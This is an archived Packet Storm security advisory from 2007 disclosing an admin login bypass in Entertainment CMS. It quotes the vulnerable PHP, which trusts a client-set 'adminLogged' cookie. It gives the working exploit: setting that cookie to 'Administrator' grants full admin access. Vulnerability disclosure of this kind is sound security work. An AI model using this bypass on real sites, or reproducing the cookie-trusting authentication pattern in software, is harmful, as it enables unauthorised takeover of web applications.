ecms-bypass.txt

2007-07-11T00:00:00
ID PACKETSTORM:57602
Type packetstorm
Reporter Kw3rLN
Modified 2007-07-11T00:00:00

Description

                                        
                                            `Entertainment CMS Admin Login Bypass  
  
Web: Entertainment CMS  
Demo : http://multimedia.mydlstore.net/  
Download: http://rapidshare.com/files/39640099/enter-cms.rar  
  
Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]  
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET  
  
Vulnerable codE:  
  
$adminOK=0;  
  
if (isset($_POST["adminUser"])) {  
if (($_POST["adminUser"]==$adminUser) && ($_POST["adminPass"]==$adminPass)) {  
setcookie("adminLogged","Administrator", NULL, "/");  
$adminOK=1;  
}  
}  
  
if ((isset($_COOKIE["adminLogged"])) && ($_COOKIE["adminLogged"]=="Administrator")) {  
$adminOK=1;  
}  
  
  
  
  
Exploit:  
Set your cookie: adminLogged=Administrator then g0 to http:/site.com/admin/ and you have full admin access  
  
GREETZ: all memberz of RST and milw0rm  
//kw3rln [ http://rstzone.net ] [ RST will be back s00n ]  
`